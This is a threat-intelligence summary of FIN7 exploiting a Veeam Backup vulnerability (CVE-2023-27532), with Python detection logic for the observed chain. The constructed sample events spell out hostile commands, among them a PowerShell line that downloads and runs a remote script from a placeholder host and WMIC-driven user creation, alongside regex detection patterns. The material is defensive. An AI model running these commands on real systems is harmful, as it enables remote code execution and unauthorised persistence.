FIN7 Operators Seek Out Veeam Backup Servers for Network Compromise
Category: Threat Actor Activity | Industry: Global | Level: Tactical | Source: WithSecure
The financially motivated threat group FIN7 has been observed exploiting vulnerabilities in Veeam Backup and Replication software to compromise data. In a report from WithSecure Intelligence, researchers describe an attack on March 28th, 2023, in which shell commands were executed from a Veeam Backup instance. WithSecure attributed the attack to FIN7 operators or to attackers with access to "FIN7 tradecraft." With "low-to-medium confidence," WithSecure assessed that the attackers exploited CVE-2023-27532, which allows unauthorized users within the network perimeter to access encrypted credentials stored in the configuration database of the exposed Veeam server. Additional observations of the exploited server support this: probing activity was seen a few days prior, port 9401 (the Veeam Backup Service over SSL) was open, the servers were vulnerable to CVE-2023-27532, and the release of a proof-of-concept (POC) for CVE-2023-27532 by Horizon3 on March 23rd preceded the attack by a few days. "The POC contains remote command execution functionality. The remote command execution, which is achieved through SQL shell commands, yields the same execution chain observed in this campaign," said WithSecure.
The shell commands initiated the download and execution of a PowerShell script from a 'sqlservr.exe' process. Analysis of the PowerShell scripts found they were POWERTRASH, "an obfuscated loader written in PowerShell that has been attributed to FIN7." The naming convention of the scripts aligns with files deployed by FIN7 in other campaigns. WithSecure's incident timeline indicates the intrusion spanned two days. Reconnaissance commands were launched to identify network connections, running processes, IP configurations and registry settings for Veeam. For persistence, a new account was created using WMIC. Several PowerShell scripts launched by the operator also helped establish persistence in the registry. Lateral movement was first tested using WMI method invocations. WithSecure then identified the attackers transferring two of their PowerShell scripts by dropping them into the ADMIN$ share of the remote host over SMB and executing them "through remote service creation." The scripts were used to enumerate the target host and "performed remote injection into the 'PlugPlay' service, making a network connection to a remote host on port 443." WithSecure has not determined the attacker's objective in this campaign, and the specific exploit used against Veeam remains unknown. However, the Veeam software is clearly within the threat actor's attack scope, underscoring the urgency for administrators to patch and defend their servers.
- PowerShell & Persistence for Lateral Movement/Process Injection
- PowerShell Runs Recon, Executes Script and Establishes Persistence
Anvilogic Use Cases:
- Invoke-Expression Command
- Create/Add Local/Domain User
- Windows Service Created
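The execution chain above (PowerShell spawned from sqlservr.exe, Invoke-Expression, account creation via WMIC, WMI method invocation against a remote host, and a service installed to run a script dropped into ADMIN$) maps directly onto the use cases listed. As an added example that is not WithSecure's or Anvilogic's code, the following Python runs that detection logic over constructed event records; the field names, host names, paths and URL are assumptions and placeholders, not real indicators.

```python
import re
# Added example, not WithSecure's or Anvilogic's code; field names are assumptions
# shaped like Sysmon EID 1 (process create) and System EID 7045 (service installed).
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
NET_USER_ADD_RE = re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I)
# ADMIN$ maps to %SystemRoot%, so a script dropped there runs as C:\Windows\<name>.ps1.
SYSTEMROOT_SCRIPT_RE = re.compile(r"\\windows\\[^\\\s\"]+\.ps1\b", re.I)

def detect(ev):
    """Return the detection names fired by one event dict (empty list if nothing fires)."""
    hits = []
    if ev["event_id"] == 1:
        parent, image = (ev[k].lower().rsplit("\\", 1)[-1] for k in ("parent_image", "image"))
        cmd = ev["command_line"]
        if parent == "sqlservr.exe" and image in ("powershell.exe", "cmd.exe"):
            hits.append("sqlservr_spawns_shell")  # SQL shell command -> PowerShell loader
        if image == "powershell.exe" and IEX_RE.search(cmd):
            hits.append("invoke_expression_command")
        if NET_USER_ADD_RE.search(cmd):
            hits.append("local_user_created")  # also matches 'wmic process call create "net user ..."'
        if image == "wmic.exe" and "/node:" in cmd.lower():
            hits.append("wmic_remote_process_create")  # WMI method invocation against another host
    elif ev["event_id"] == 7045:
        hits.append("windows_service_created")
        path = ev["image_path"]
        if "powershell" in path.lower() or SYSTEMROOT_SCRIPT_RE.search(path):
            hits.append("service_runs_script_from_admin_share")
    return hits

def triage(events):
    """Group fired detections per host so the whole chain on one box stands out."""
    by_host = {}
    for ev in events:
        for hit in detect(ev):
            by_host.setdefault(ev["host"], set()).add(hit)
    return {host: sorted(hits) for host, hits in by_host.items()}

# Constructed sample telemetry: placeholder hosts, paths, names and URL, not real IoCs.
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "veeam01", "parent_image": r"C:\placeholder\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')\""},
    {"event_id": 1, "host": "veeam01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic process call create "net user placeholder_adm Placeholder1 /add"'},
    {"event_id": 1, "host": "veeam01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic /node:fileserver02 process call create "powershell -nop -c whoami"'},
    {"event_id": 7045, "host": "fileserver02", "image_path": r"powershell -ep bypass -f C:\Windows\placeholder.ps1"},
]
```

Calling `triage(SAMPLE_EVENTS)` groups the hits per host, which is the view an analyst wants when deciding whether a single Veeam server shows the full chain rather than one isolated alert.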